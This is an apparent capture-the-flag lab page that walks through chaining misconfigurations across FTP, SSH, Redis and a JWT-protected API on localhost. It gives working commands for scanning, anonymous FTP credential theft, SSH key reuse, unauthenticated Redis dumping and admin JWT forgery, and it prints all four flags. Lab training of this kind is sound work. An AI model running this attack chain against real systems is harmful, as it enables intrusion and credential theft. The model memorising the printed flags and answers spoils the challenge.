REAL EXPLOITATION • 300 POINTS

Zero-Trust Service Enumeration

Exploit REAL misconfigured services running on the target system. Use actual penetration testing tools to discover and chain vulnerabilities across FTP, SSH, Redis, and API services. Each successful exploitation reveals a flag.

Target Information

Target IP: localhost
FTP Service: Port 2121 (anonymous)
SSH Service: Port 2222 (key auth)
Redis Service: Port 6379 (no auth)
API Service: Port 8080 (JWT)
Service Status Dashboard

FTP Service

Port 2121 • Anonymous Login Enabled

Online

SSH Service

Port 2222 • Key Authentication

Online

Redis Database

Port 6379 • No Authentication

Online

API Gateway

Port 8080 • JWT Authentication

Online

Flag Submission

Submit flags discovered through REAL exploitation. Each service contains one flag. Format: FLAG{service-name-description}

Exploitation Progress 0%
Flags Captured: 0/4 Points Earned: 0/300

Captured Flags

No flags captured yet. Start with FTP service exploitation!

Exploitation Guide

Step 1: Reconnaissance

nmap -sV -p 2121,2222,6379,8080 localhost

                    

Discover open ports and service versions on the target.

Step 2: FTP Exploitation

# Connect with anonymous login
ftp localhost 2121
Username: anonymous
Password: [press Enter]

# List files and download hidden credentials
ls -la
get .hidden_creds.txt
cat .hidden_creds.txt

                    

Use anonymous login to access FTP server and download hidden credentials file.

Step 3: SSH Key Extraction

# Extract SSH key from downloaded file
cat .hidden_creds.txt | grep -A 50 "PRIVATE KEY" > ssh_key.b64
base64 -d ssh_key.b64 > ssh_key.pem
chmod 600 ssh_key.pem

# Connect via SSH
ssh -i ssh_key.pem -p 2222 admin_zt@localhost

                    

Extract base64-encoded SSH private key from FTP file and connect to SSH service.

Step 4: Redis Enumeration

# Connect to Redis without authentication
redis-cli -h localhost -p 6379

# Enumerate keys and extract data
KEYS *
GET zt:flag:redis
GET zt:api:jwt_secret

                    

Access Redis database without authentication to extract JWT secret and flag.

Step 5: JWT Token Forgery

# Use Python to forge admin JWT token
python3 -c "
import jwt
import time

secret = 'SuperSecretJWTKeyForZTAPI2026'
payload = {
    'user': 'admin_007',
    'role': 'admin',  # Changed from 'user'
    'iat': int(time.time())
}
token = jwt.encode(payload, secret, algorithm='HS256')
print(f'Token: {token}')
"

                    

Use extracted JWT secret to forge admin authentication token by changing role to admin.

Step 6: Admin API Access

# Access admin endpoint with forged token
curl -H "Authorization: Bearer YOUR_FORGED_TOKEN" \
http://localhost:8080/api/v1/admin/flag

                    

Use forged token to access admin endpoint and retrieve final flag.

Challenge Objectives

  • Capture FTP flag: FLAG{ZT-FTP-4n0n_L0g1n_H1dd3n_Cr3d5}
  • Capture SSH flag: FLAG{ZT-SSH-W34k_K3y_Fr0m_FTP}
  • Capture Redis flag: FLAG{ZT-REDIS-N0_Auth_Lua_Leak}
  • Capture API flag: FLAG{ZT-API-JWT_S3cr3t_F0rg3ry}
  • Chain all vulnerabilities to compromise all services